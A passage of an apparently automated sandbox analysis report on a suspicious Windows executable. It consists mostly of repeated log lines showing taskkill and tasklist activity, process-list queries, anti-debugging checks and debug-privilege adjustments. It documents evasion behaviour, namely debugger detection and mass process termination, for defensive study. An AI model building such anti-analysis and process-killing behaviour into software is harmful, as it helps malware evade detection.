Source: C:\Windows\System32\taskkill.exe TID: 3300	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3300	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3236	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3236	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3104	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3104	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3584	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3584	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3248	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3248	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1304	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1304	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3400	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3400	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1308	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1308	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3744	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3744	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3864	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3864	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 268	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3480	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 872	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 872	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3764	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3764	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3756	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3756	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3264	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3264	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3904	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3904	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3892	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3892	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3912	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3912	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 544	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 544	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2008	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2008	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2216	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2216	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3456	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3456	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3516	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3516	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1832	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1832	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3160	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3160	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1612	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1612	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 404	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 2204	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2104	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2104	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 580	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 580	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 292	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 292	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3712	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3712	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3452	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3452	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2332	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2332	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2548	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2548	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1372	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1372	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2560	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2560	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2872	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2872	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2312	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2312	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 1756	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 2708	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2600	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2600	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2364	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2364	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2828	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2828	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2908	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2908	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2896	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2896	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2852	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2852	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2572	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2572	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1916	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1916	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2092	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2092	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1196	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1196	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3340	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3340	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2588	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2588	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3344	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3344	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 636	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3328	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 768	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 768	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1668	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1668	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 172	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 172	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2256	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2256	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3228	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3228	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1300	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1300	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3380	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3380	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1380	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1380	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3724	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3724	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 488	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 488	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3404	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3404	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1812	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1812	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 872	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3840	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3872	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3872	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 988	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 988	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 436	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 436	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3960	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3960	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3180	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3180	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2284	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2284	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2920	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2920	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2456	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2456	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 544	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 544	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1908	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1908	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3932	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3932	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2128	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2128	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3468	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3564	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3988	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3988	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3560	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3560	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2500	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2500	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1312	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1312	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2724	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2724	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3948	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3948	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2204	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2204	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3708	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3708	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2096	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2096	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 228	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 228	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 728	Thread sleep time: -120000s >= -60000s

Queries a list of all running processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe

Process information queried: ProcessInformation

Anti Debugging:

Checks for debuggers (devices)

Show sources

Source: C:\inst_fold\fp.exe	File opened: C:\Windows\system32\en-US\filemgmt.dll.mui
Source: C:\inst_fold\fp.exe	File opened: C:\Windows\system32\filemgmt.dll
Source: C:\inst_fold\fp.exe	File opened: C:\Windows\WinSxS\FileMaps\inst_fold_e86aef04a9fd3f16.cdf-ms

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe

System information queried: KernelDebuggerInformation

Enables debug privileges

Show sources

Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
